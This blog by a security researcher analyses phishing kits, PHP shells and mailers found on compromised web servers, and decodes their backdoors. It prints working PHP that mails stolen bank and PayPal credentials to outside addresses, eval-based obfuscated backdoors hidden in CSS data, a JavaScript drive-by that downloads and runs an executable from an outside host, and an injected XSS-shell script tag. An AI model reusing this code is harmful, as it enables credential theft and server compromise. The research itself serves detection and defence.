marco

blog

Menu:

• home
• publications
• projects
• blog

Craigslist phishing

December 11, 2010

Another interesting attack that targets Craigslist users. I've just received an email with the following content:

Is this your item? It has the same description/pics. Please check it: http://sfbay.craigslist.org/1153605583.html

Thank you.

Needless to say, the link in the email does not point to craigslist.org, but to http://031e0e2.netsolhost.com/?check=item-id-1153605583.html. If you visit this page, you are presented with a simple phishing page for Craigslist:

It was surely a throw-away address, but as a reference, the original sender of the phishing email was brathwaite800345@gmail.com.

Stay away from this guy and this site...

Posted by marco in phishing
0 comments

Obfuscated backdoor or joke?

October 7, 2008

It is very common to find web-based malware that is protected by one, two, or even three rounds of obfuscation. Obfuscation reduces the chances that anti-malware tools automatically detect the threat and slows down manual analysis.

But, what about 48 (yes, forty-eight!) layers of obfuscation? A phishing kit for PayPal found on the site for PhishTank's entry 502529 contained the following PHP code:

<?   eval(gzinflate(base64_decode('DZdHDsTWEQWv4p1lcMGcYFkCc86ZG2GY
c45zeg9P8NHNrlfv77/+/Ptf5fUZ/qi/7VQNn6P8Yz+2f7b5gNE/ss9eEtg/RZnPRfn
...
iJvAQurlJL/whtxnAqS+mV8XYRnKzb1/GZw/zd/1S/bqWwDFK3AFxPSt1LcQgUJZgdZ
QgCMpxBYIUAVL/+/d/ft9///X3X3/+/X8='))); ?>

After the first deobfuscation, one obtains:

><?   >eval(gzinflate(str_rot13(base64_decode('FZfHDoToEYRfxTevxYGc5
LVK5JwzF4schpyZp/csEhInoPvv+rrqr//++dc/qisb/nW+3UcP2UT9sR/b/7b5gNE/8
...
c8B1Fs0A/FFcVn1mGJmSUb77fTB+wxXDBv/GkFqPBSkm2N+x6LNrGy1a7ro+58z4Lfdm
iWHhsrzATBtN3mhGgyROECAIXj+XgoIggEX/+ee/fte///HXf//86/8=')))); ?><

The same technique (eval composed with gzinflate, str_rot13, and base64_decode) is used in all the remaining layers. After 48 decoding steps, the familiar phish drop/backdooring code is revealed:

<?
include 'write your mail here.txt';
include 'images/header.bmp';
$ladate=date("D M d, Y g:i a");
$ip = getenv("REMOTE_ADDR");
$message .= "--------------PayPal  Spam ReZulT-----------------------\n";
$message .= "E-Mail ID          : ".$_POST['login_email']."\n";
$message .= "Password         : ".$_POST['login_password']."\n";
$message .= "ip: $ip\n";
$message .= "Date: $ladate\n";
$message .= "---------------Created BY Dj_Amen@hotmail.fr-----------------------------\n";

$T = "$to,$iks";

$subject = "PayPal ReZuLt "; 
$headers = "From: Amen<steamhacktn@gmail.com>"; 
$headers .= $_POST['eMailAdd']."\n"; 
$headers .= "MIME-Version: 1.0\n"; 

mail($T,$subject,$message,$headers);    
header("Location: Processing.htm");

?>

The iks variable is defined in the header.bmp file and corresponds to the address amen.dj@gmail.com:

<?
$ik = "YW1lbi5kakBnbWFpbC5jb20=";
$iks = base64_decode("$ik");
?>

Posted by marco in malware, phishing
0 comments

Backdoored PHP shells

September 13, 2008

PHP shells are tools that attackers often use to manage compromised web servers. It turns out, some of these attackers may be attacked by their own tools.

In fact, PhishTank report 505183 shows a nice example of a backdoor inserted in a PHP shell. The shell in question is a variant of the w4ck1ng shell. Each page generated by the shell contains the following script tag:

<script>
var dc=document.write;
var sc=String.fromCharCode;
var exe="http://reda-vision.com/config.exe";
var file="run.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,
44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + 
exe + sc(34,59,122,104,97,110,61,34) + file + sc(34,59,99,109,100,115,
115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,
...
97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
</script>

After decoding the JavaScript code, a classic drive-by download attack is revealed:

var ailian,zhan,cmdss;
ailian="http://reda-vision.com/config.exe";
zhan="run.exe";
cmdss="cmd.exe";    
try{    
  var ado=(document.createElement("object"));
  var d=1;
  ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  var e=1;
  var xml=ado.CreateObject("Microsoft.XMLHTTP","");
  var f=1;
  var ln="Ado";
  var lzn="db.St";
  var an="ream";
  var g=1;
  var as=ado.createobject(ln+lzn+an,"");
  var h=1;
  xml.Open("GET",ailian,0); 
  xml.Send(); 
  as.type=1;
  var n=1;
  as.open();
  as.write(xml.responseBody);
  as.savetofile(zhan,2);
  as.close();
  var shell=ado.createobject("Shell.Application","");
  shell.ShellExecute(zhan,"","","open",0);
  shell.ShellExecute(cmdss," /c del /S /Q /F "+zhan,"","open",0);
} catch(e){};

The config.exe file is detected by one third of the antivirus tools used by VirusTotal, and, according to the Anubis report, behaves like a Bifrost variant.

Posted by marco in malware, phishing, javascript
0 comments

Lost and found on phishing sites: exploits

August 13, 2008

After breaking into a web server, attackers often want to get higher privileges on the local machine (through local-to-root attacks) and to compromise other remote machines (remote-to-local attacks). To do that, they "need exploits, lots of exploits".

And so, it is time to talk about the exploitation tools found on phishing sites.

Sifting through the various tools, scripts, and programs abandoned on these sites offers more than one interesting finding. One can find recent exploits, such as the one attacking the vmsplice bug in 2.6.x Linux kernels; older ones targeting sendmail on Linux 2.2.x; historic ones, such as the smurf attack released in 1999; and exotic exploits, such as a local root against AIX.

Among the remote exploitation tools, vulnerability scanners are very popular. They mostly look for file injection vulnerabilities, generally using google dorks (i.e., they are search worms).

And, unsurprisingly, considering the current botnet fad, bots are also very popular. The ones I've found are traditional bots that connect to IRC channels and wait commands. Good, old, DDoS attacks seem also common, either through TCP, UDP, or HTTP.

Related posts:

• Lost and found on phishing sites: mailers
• Lost and found on phishing sites: PHP shells

Posted by marco in malware, phishing
0 comments

There's no free phish

July 27, 2008

Tomorrow, I'm going to present our paper There is No Free Phish: An Analysis of "Free" and Live Phishing Kits at the USENIX WOOT Workshop. The paper talks about phishing kits, which are phishing sites in a ready-to-deploy package. We collected a large number of these kits, both from sites distributing them and live phishing web servers. We found that phishing kits really are a double-edged sword: on one hand, phishers use them to get confidential information from unsuspecting victims; on the other hand, more experienced attackers plant backdoors in these kits through which they covertly receive the information phished by the kits' users.

Here is the abstract:

Phishing is a form of identity theft in which an attacker attempts to elicit confidential information from unsuspecting victims. While in the past there has been significant work on defending from phishing, much less is known about the tools and techniques used by attackers, i.e., phishers. Of particular importance to understanding the phishers' methods and motivations are phishing kits, packages that contain complete phishing web sites in an easy-to-deploy format. In this paper, we study in detail the kits distributed for free in underground circles and those obtained by crawling live phishing sites. We notice that phishing kits often contain backdoors that send the entered information to third parties. We conclude that phishing kits target two classes of victims: the gullible users from whom they extort valuable information and the unexperienced phishers who deploy them.

After WOOT, I'm going to attend USENIX Security.

See you in San Jose!

Posted by marco in paper, phishing
0 comments

Lost and found on phishing sites: mailers

July 14, 2008

This is the second installment in the series about interesting things found on web sites that are taken over to host phishing pages. This time, we talk about mailers (the first post was about PHP shells), and — little teaser — we keep a surprise for the end of the post.

So, the bad guys have just compromised a web server, uploaded a phishing kit, and deployed a perfect copy of, say, Bank of America. What's the next step? The attackers just have to attract victims to the site and hope that they will give away their credentials and other confidential information. The best way of doing it is to spam the world with emails claiming that the recipient's account has been suspended (or some other more or less plausible story) and that the situation can be solved by visiting the phishing site.

How do the phishers send the emails? If they don't want to rent a botnet, a cheap way is to use the compromised server's resources. And here is where a mailer comes useful. A mailer is a program, typically written in PHP, that has a web-based interface through which one can insert the mail's message and a list of recipients. The program then sends out the emails. Here is a screenshot of one of these mailers:

The mailers I've seen most frequently are Subzero, Str8 Inbox, PHP Mailer, ToXiC350 MailEr, Mailing Machine, Bulk Maileren, INBOX PHP-Mailer, Mailer All Inbox, Mass Fuckin Mailer Inbox, PHP-Mailer by Mr-Brain (a familiar name, isn't?). Furthermore, many of the PHP shells we have seen previously also offer mailer functionality.

Finally, here is one surprise I've found in one of the mailers whose source code was also left on the phishing site:

<?php
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$message=$_POST['message'];
$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJ
qOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
?>

And the last string, if you don't read base64, really is:

mail("grofi_hack@hotmail.com", $subj98, $msg, $message, $ra44);

So, a little backdoor! What is a poor phisher to do? After phishing kits, one cannot even trust mailers...

Posted by marco in malware, phishing
0 comments

Lost and found on phishing sites: PHP shells

July 12, 2008

It is not uncommon for phishing pages to be hosted on compromised web servers. When this happens, besides phishing, the web server is used for a variety of malicious activities. We have seen some time ago a case where such a site was hosting an XSS-based botnet tool.

With this post, I'll start a brief series (probably 3-4 installments in total) on the interesting things you can find on web sites that are taken over to host phishing pages. For today, the topic is PHP shells.

PHP shells are PHP scripts that allow one to execute a number of commands on a remote server through a simple web-based interface. They are used by attackers to easily manage the compromised server, install new tools, attack other sites, and so on.
Here is a screenshot of one of these shells (click on the image for a larger picture):

From what I've seen, the most commonly-used shells are C99Shell, w4ck1ng, N3tShell, Room Hacker shell, SimAttacker, Locus7s, Vop-Cr3W shell, storm7shell, Safe0ver, Enqu!nx, PHPShell, BK-Code Shell, r57shell, K-H shell, HaTeX shell, phpRemoteView, UniXShell, and BLaCkSHeLL. Of many of these shells, multiple versions exist, with changes ranging from simple modding (e.g., adding scrolling text in the header of the page saying "ccpower was here !") to the introduction of new features.

In terms of functionality, the basic commands include file system management (listing of directories, changing the attributes of files), file upload, and command execution on the server. More advanced features allow the attacker to

• connect to databases,
• install trojans,
• inject HTML text (e.g., iframes) into all the web pages on the server,
• attempt a number of exploits (e.g., the Linux race exploit of some time ago), and
• brute-force FTP credentials.

Some shells even have the ability to check for updates and to self-remove from the remote server. At least some people are keeping their software updated...

Posted by marco in malware, phishing
1 comment

'tis the season (for some phishers)

June 21, 2008

Phishers do put a lot of effort into creating a successful phishing site. They register domains that look like the legitimate ones, set up fast-flux infrastructures, compromise vulnerable machines to deploy phishing kits, send lots of emails to attract victims.

However, sometimes phishers slip up. For example, deploying a Christmas-themed PayPal phishing site in June is, well, a giveaway...

Happy holidays!

Posted by marco in malware, phishing
1 comment

An old phishing trick

June 17, 2008

Certain old tricks just don't want to go away. By all standards, the fake address bar trick must be a classic. It consists of showing an image that looks like the browser's address bar at the top of the page, displaying a legitimate URL.

A recent reappearance of this trick occurred in PhishTank entry 459204. The phishing pages were hosted on lsarccc.com, but the fake address bar displays the more reassuring domain www.lloydstsb.com.

Welcome back...

Posted by marco in malware, phishing
0 comments

Obfuscated phish

June 9, 2008

One interesting twist in phishing is the use of obfuscation to masquerade the real content of phishing pages. PhishTank entry 444100 was a good example of this new "evolution".

The main page of the phish replicates the login page of eBay. As is commonly done, the login form is handled by a PHP script on the vulnerable server. More interesting are the links to other resources, Consider, for example, the link to the page describing the policies of the targeted site. It also points at a local file, named k.html. However, k.html uses JavaScript to obfuscate its contents:

document.write(unescape("%3C%53%43%52%49...%50%54%3E"));
hp_d00(unescape("%3C%53%43%52...50%54%3E"));
hp_d00(unescape("%3C%48%45%41...%41%44%3E"));
hp_d00(unescape("%3C%42%4F%44...44%59%3E"));

It is trivial to revert the obfuscation and reveal the actual content:

<SCRIPT LANGUAGE="JavaScript"><!--
hp_ok=true;function hp_d00(s){if(!hp_ok)return;document.write(s)}
//--></SCRIPT>
<SCRIPT LANGUAGE="JavaScript"><!--
function hp_ne(){return true}onerror=hp_ne;
if(navigator.userAgent.indexOf('Opera')!=-1)
    window.location="about:blank";
//--></SCRIPT>
<HEAD><META HTTP-EQUIV="Pragma" CONTENT="No-Cache"><META NAME="Robots"
CONTENT="NoIndex"><META HTTP-EQUIV="Expires" CONTENT="-1"></HEAD>
<BODY><meta http-equiv="Refresh"
content="0;url=http://pages.ebay.com/help/policies/hub.html?ssPageName=f:f:US">
</BODY>

The generated HTML code redirects to the appropriate page on the legitimate eBay site. Note that, by using a refresh redirect (never mind that it should be in the head section of the file, rather than in the body), the phishing site clears the referer header and, thus, evades simple hotlinking analysis. At this point, it is not clear to me why the script handles opera differently. Suggestions?

Posted by marco in malware, phishing
2 comments

Phish by SMS

May 16, 2008

And when you thought you knew all the tricks to detect phishing sites, had installed all the anti-phish browser plugins, and had developed a bunch of heuristics to identify phishing e-mails at first sight, they change the medium.

This morning I received the following SMS from 1010100001:

FRM:security@rabobankamerica.com
SUBJ:ALERT
MSG:Your Rabobank America account is closed due to unusual activity,
call us now at 8603830711.

Besides the obviously bogus source number, the fact that I don't have an account at Rabobank America was sort of a give away... The phone number turned out to be already disconnected, but I suspect I would have found a voice message asking for my credentials and other confidential information.

I think this is an interesting development. First, we are certainly less experienced at considering SMS content as suspicious. If you receive SMSs only from friends (and possibly the annoying advertisements from your carrier), you may think SMSs are trustworthy by default. Second, on cell phones, we may have less possibilities to check the authenticity of received messages: my (admittedly, very cheap and unsophisticated) phone has no anti-phish SMS plugin and no browser.

From the attacker's point of view, it would be interesting to see how they are paying for sending the messages. Compromised accounts on an SMS-sending web site? Stolen credit card? Other suggestions?

Posted by marco in malware, phishing
0 comments

Phished and botted

May 11, 2008

It's not uncommon for attackers to exploit a vulnerable web server and use it for several different purposes: maximization of the return on investment, some might say. Case in point are three recent entries in PhishTank (439391, 439479, and 442568).

As the PhishTank reference says, these sites were used to host phishing pages. Nothing special here: the usual replicas of banking and governmental web sites. More interestingly, all the legitimate HTML pages on the sites were modified to include the following script tag:

<script src="http://216.214.109.45/private/xxx/xssshell.asp?v=336699"></script>

This code fetches a copy of the XSS Shell, a tool that essentially transforms the browser into a bot, controllable by the attacker through cross-site scripting (XSS) mechanisms. The tool, published at the end of 2006 as a proof-of-concept of XSS, comes with a useful set of predefined commands (e.g., start keylogging, get internal IP, launch DoS attack), is prepackaged with a nice administration interface, and has extensive documentation.

It turns out that the attacker hasn't fully read the xssshell instructions, in particular the part on installing the back-end database outside of the document root, with the effect that the database is publicly accessible... The database contains information about the victims of the tool and a log of the attacker's commands. After opening the database, a MS Access file readable with the MDB Tools, it is possible to reconstruct some of the attacker's activity.

Here are the highlights:

• It appears that the attack has been active since April 22.
• At the moment of writing, it has involved 9333 distinct IP addresses, or about 490 different IPs per day.
• The attacker seems to have quite a varied set of interests: he/she stole at least 60 cookies, eavesdropped on 50 or so pages being viewed by the victims, launched about 20 times the keylogging procedure, and experimented for over 400 times with the DDoS feature.

Posted by marco in malware, phishing, botnets
0 comments

A tale of scam kits

April 2, 2008

A few days ago, the news spread that ready-to-go scam kits targeting banks and other sensitive web sites were available for download. Nothing new here except for the fact that the kits were given away for free.

The reason for such generosity? Will see in a moment.

I've got my hands on some of the kits and I've analyzed one of them. This analysis is relative to the Chase scam kit (others seem similar at first sight) retrieved on 31/3/2008.

The scam kit is a collection of php, html, css, and image files that provide a phishing web site for JP Morgan Chase online banking. The kit collects username, password and personal information, such as credit card numbers and social security numbers. The collected information is sent back to the scammer via e-mail. At first sight, all a scammer has to do is modify one file in the kit to set the appropriate e-mail address and attract traffic to the phishing page.

The reality is bit different: a larger pool of people seem to benefit from the scammer's efforts. In other words, scammers are getting scammed by more clever scammers.

Let's see how this happens.

Transmission code

The file Mr-Brain.php contains the code to ship to information back to the scammer. The code is:

 3: $message = ... // phished information
    ...
39:
38: $send="scammer_forlife@yahoo.com";
39:
40: $subject = "Chase Bank ReZulT | $user | $ip";
41: $headers = "From: Mr-Brain<new@chase.com>";
42: $str=array($send, $IP); foreach ($str as $send) {
43: if(mail($send,$subject,$message,$headers) != false){
44: mail($Send,$subject,$message,$headers);
45: mail($messege,$subject,$message,$headers);
46: }

mail() is a standard PHP function that send an e-mail message to the address specified in its first argument. Let's see how the kit uses this code to distribute information to a number of addresses other than scammer_forlife@yahoo.com.

Trick 1: mistyped variables

In Mr-Brain.php, the email message is composed as follows:

$hostname = gethostbyaddr($ip);
$message  = "---------------+ Chase Bank Spam ReZulT +-----------------\n";
$message .= "User ID : $user\n";
...
$messege .= "hostip";
$message .= "Full Name : $fullname\n";
...
$message .= "City : $city\n";
$messege .= "port";
$message .= "State : $state\n";
...
$message .= "Mother Maiden Name : $mmn\n";
$messege .= "@";
$message .= "Date of Birth : $bmonth/$bday/$byear\n";
...
$message .= "ATM PIN Code      : $pin\n";
$messege .= "g";
$message .= "Credit Card Number: $cardnumber\n";
...
$message .= "CVV Number       : $cvv\n";
$messege .= "mail";
$message .= "---------------------------------------------------\n";
...
$messege .= ".";
$message .= "Credit Card Number: $cardnumber\n";
...
$messege .= "com";
...
$message .= "----------------+ Created in 2008 By Mr-Brain +----------------\n";

Notice the mistyped $messege variable (instead of $message). Once reconstructed the variable forms the e-mail address hostipport@gmail.com. At line 45 it is used as the recipient of the mail function. The trick uses the fact that PHP automatically initializes undefined string variables (as $messege here) to the empty string.

Trick #2: case-sensitive PHP and code injection

Inside the foreach loop of line 42, the variable $Send (notice the capital letter) is different from the variable $send (all lowercase). How is $Send initialized? In details.php, a form contains the hidden parameter Send, whose value is set to:

<?=base64_decode("TXItQnJhaW5ARXZpbC1CcmFpbi5OZXQ=");?>

which, once interpreted, gives the e-mail address Mr-Brain@Evil-Brain.Net.

Trick #3: obfuscation via pack()

The sending code loops over the contents of an array initialized with the variables $send and $IP. What is $IP? In prospect.php, the variable $IP is initialized to

pack("H*", substr($VARS=$erorr,strpos($VARS, "329")+3,46));

$erorr (again, misspelled to disguise it for the variable $error) contains the contents of the file login.php. The substr() function searches for 329 in login.php, finds it in the value argument of a hidden parameter, and extracts the following 46 characters:

70696f6e6565722e627261696e40676d61696c2e636f6d

These are then massaged through the function pack() to give yet another e-mail address: pioneer.brain@gmail.com

Trick #4: obfuscation via code in data and eval()

prospect.php contains the following interesting functions:

39: function clean($str){
40: $clean=create_function('$str','return '.gets("(1,",3,4).'($str);');
41: return $clean($str);
42: }
43: function getc($string){
44: return implode('', file($string));
45: }
46: function gets($a, $b, $c){
47: global $d; return substr(getc($d),strpos(getc($d),$a)+$b,$c);
48: }
49: function end_of_line(){
50: $end=gets("(2,",3,4); endline=$end(gets("(3,",3,2),getc(gets("(((",3,20)));
51: return $endline;
52: }
53: function geterrors(){
54: return clean(end_of_line());
55: }

The function geterrors() is called at the end of the file, right before error checking is performed. Let's see what these functions are doing:

• end_of_line: by matching for the pattern (2, on the details.php file, it extracts the string pack. By pattern matching for (3, and (((, it extracts the strings h* and images/style_002.css. These pieces are composed to execute:

  :::php pack('h*', file_get_contents('images/style_002.css'));

  The file images/style_002.css apparently contains CSS data, except for a section at the middle of the file that resembles a long alphanumeric string. After applying pack() to it, it returns a long string containing unprintable characters at the beginning and at the end. The central section of images/style_002.css is instead transformed into:

    global $error;
    if("$error" != "1"){
        global $user;
        global $pass;
        global $fullname;
        global $address;
        global $city;
        global $state;
        global $zip;
        global $email;
        global $mmn;
        global $bmonth;
        global $bday;
        global $byear;
        global $ssn1;
        global $ssn2;
        global $ssn3;
        global $pin;
        global $cardnumber;
        global $expmonth;
        global $expyear;
        global $cvv;
    if (getenv(HTTP_CLIENT_IP)){
        $iP=getenv(HTTP_CLIENT_IP);
    } else {
        $iP=getenv(REMOTE_ADDR);
    }
    $hostname = gethostbyaddr($iP);
    $message  = "---------------  Chase Bank Spam ReZulT  -----------------\n";
    $message .= "User ID : $user\n";
    $message .= "Password : $pass\n\n";
    $message .= "Full Name : $fullname\n";
    $message .= "Address : $address\n";
    $message .= "City : $city\n";
    $message .= "State : $state\n";
    $message .= "Zip Code : $zip\n";
    $message .= "E-mail Address : $email\n\n";
    $message .= "Mother Maiden Name : $mmn\n";
    $message .= "Date of Birth : $bmonth/$bday/$byear\n";
    $message .= "Social Security No : $ssn1-$ssn2-$ssn3\n";
    $message .= "ATM PIN Code      : $pin\n";
    $message .= "Credit Card Number: $cardnumber\n";
    $message .= "Expiration Date   : $expmonth/$expyear [mm/yy]\n";
    $message .= "CVV Number       : $cvv\n";
    $message .= "---------------------------------------------------\n";
    $message .= "IP Address   : $iP\n";
    $message .= "HostName   : $hostname\n";
    $message .= "----------------  Created in 2008 By Mr-Brain  ----------------\n";
    $Brain="pamer@inbox.com,usa813@gmail.com";
    $subject = "Chase Bank ReZulT";
    $headers = "From: Mr-Brain<new@chase.com>";
    mail($Brain,$subject,$message,$headers);
    }

• clean: by matching for the pattern (1, on the details.php file, it extracts the string eval. It then creates and returns an anonymous function that accepts a single parameter and applies eval() to it.

• geterrors: evaluates through eval the string returned by end_of_line(). Notice that eval ignores the extra junk at the beginning and end of the string and happily executes the relevant content, thus sending the phished information also to pamer@inbox.com and usa813@gmail.com.

Posted by marco in malware, phishing
0 comments